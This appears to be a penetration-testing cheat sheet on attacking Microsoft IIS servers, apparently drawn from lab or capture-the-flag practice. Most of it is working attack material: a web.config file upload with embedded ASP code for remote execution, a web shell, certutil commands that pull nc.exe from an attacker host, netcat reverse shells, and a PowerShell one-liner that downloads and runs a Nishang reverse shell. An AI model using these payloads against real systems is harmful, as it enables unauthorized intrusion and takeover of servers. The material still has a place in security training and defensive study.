# IIS

## IIS Versions

* <https://en.wikipedia.org/wiki/Internet_Information_Services>
* REF: [IIS6WebDav](https://pentest.mxhx.org/04-webapps/iis6-webdav)

```
80 http Microsoft IIS httpd 7.5

IIS 7.5 = Windows 2008 R2
```

## IIS Uploads

* If you can upload to an IIS site, keep trying to see which extensions are allowed

```
test.txt        ..fail
test.asp        ..fail
test.aspx       ..fail
test.jpg        ..ok
web.config      ..ok - we can exploit
```

## RCE webconfig upload

* Old Version of IIS 7.5 that accepts fileuploads
* We can transfer our 'web.config' that includes some evil-aspx at the bottom
* <https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/>
* <https://soroush.secproject.com/blog/tag/unrestricted-file-upload/>
* REF: [RevWebShellsAsp](https://pentest.mxhx.org/03-getting-in/03-reverseshell-php#asp-webshell)

```
-------------------------------
vi web.config         ..evil asp code at bottom
Response.write(1+2)   ..test will equal 3

-------------------------------
cat /opt/shells/web.aspx

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
Set cmd = rs.Exec("cmd /c ping 10.x.x.x")
o = cmd.StdOut.Readall()
Response.write(o)
%>

-------------------------------
Execute:
http://10.x.x.x/UploadedFiles/web.config

-------------------------------
Catch a ping (did my command work?)
tcpdump -i tun0 icmp
```

## Easy

```
-----------------------
We will use web.config exploit

First web.config will download nc
python -m SimpleHTTPServer 8080
rs.Exec("cmd /c certutil -urlcache -f http://10.x.x.x:8080/nc.exe C:\Windows\Temp\nc.exe")

Second web.config will execute nc reverse
rs.Exec("cmd /c C:\Windows\Temp\nc.exe 10.x.x.x 4444 -e cmd.exe")
nc -nvlp 4444
whoami
merlin
systeminfo


```

```

-----------------------
google iis rce upload

Set cmd1 = wShell1.Exec("certutil -urlcache -split -f http://10.x.x.x:8080/nc.exe C:\\users\\public\\nc.exe")
Set cmd1 = wShell1.Exec("cmd /c c:\users\public\nc.exe 10.x.x.x 4444 -e c:\windows\system32\cmd.exe")

```

```
0xdf wrote this easy one:
To download our Nishang reverse shell and execute it

prep
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
Add a reverse call as the last line:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443
share with python

<%@ Language=VBScript %>
<%
  call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.x.x.x/Invoke-PowerShellTcp.ps1')")
%>
```